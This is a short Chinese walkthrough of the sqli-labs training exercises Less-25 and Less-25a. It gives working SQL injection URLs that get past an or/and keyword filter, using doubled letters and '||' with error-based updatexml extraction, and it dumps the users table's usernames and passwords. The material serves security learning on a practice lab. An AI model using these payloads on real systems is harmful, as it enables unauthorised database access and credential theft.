less-25

前置基础知识:后面的关卡涉及到WAF绕过:

主要有三种方式:白盒绕过、黑盒绕过、fuzz测试

网上sql注入WAF绕过的教程有很多,可以自己查询,总之就是比谁思路猥琐

根据第25关下面的提示和代码,我们发现他对or和and(不区分大小写)转义成了空格

第一种办法:

采用双写的方式

这里就直接最后一步了,几个步骤都相同:http://192.168.5.100/sqli-labs/Less-25/?id=0' union select 1,2,group_concat(concat_ws('-',username,passwoorrd)) from security.users --+(注意password中or双写)

第二种方法:or->|| 基于报错的注入

http://192.168.5.100/sqli-labs/Less-25/?id=0' || updatexml(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1),0x7e),1)--+

遍历爆出所有的数据,继续使用即可,这里不可以使用group_concat(),因为数据显示不完整

less-25a

通过观察,上一关有’‘包裹,这一关没有任何包裹,并且也是转义or和and

:http://192.168.5.100/sqli-labs/Less-25a/?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) from security.users--+

 

最新文章

  1. GET和POST有什么区别?及为什么网上的多数答案都是错的
  2. MySQL Replication需要注意的问题
  3. Error:The network adaptor could not establish the connection问题的解决办法
  4. 测试卡尔曼滤波器(Kalman Filter)
  5. PC上安装MAC X Lion
  6. .NET基础之--C#中判断空字符串的3种方法性能分析
  7. 在Activiti官方源码上提交的两个bugfix
  8. php之常量小见
  9. 一种SpringMVC调用Javascript的方法
  10. java整合flex
  11. fibos开发踩坑集合
  12. 从裸机到实时操作系统RTOS
  13. 寻找二叉树中的最低公共祖先结点----LCA(Lowest Common Ancestor )问题(递归)
  14. Unable to instantiate application com.txrj.sms.activity.TxrjApplication
  15. 2018/7/18Bad English
  16. 【数组】Majority Element II
  17. Scratch 3.0 版本比较
  18. 使用tesseract-ocr破解网站验证码
  19. cpp笔记(长期更新)
  20. js 冒泡型事件

热门文章

  1. mongodb主从复制(读写分离)
  2. 详解Docker 端口映射与容器互联
  3. XCTF IgniteMe
  4. 输出数组中出现次数最多且值最大的数字----python
  5. Adaptive AUTOSAR 学习笔记 2 - 官方文档下载及阅读建议
  6. java基础---数组的排序算法(3)
  7. C语言:按行读TXT文件
  8. MapReduce学习总结之java版wordcount实现
  9. lucene Hello World
  10. python解析excel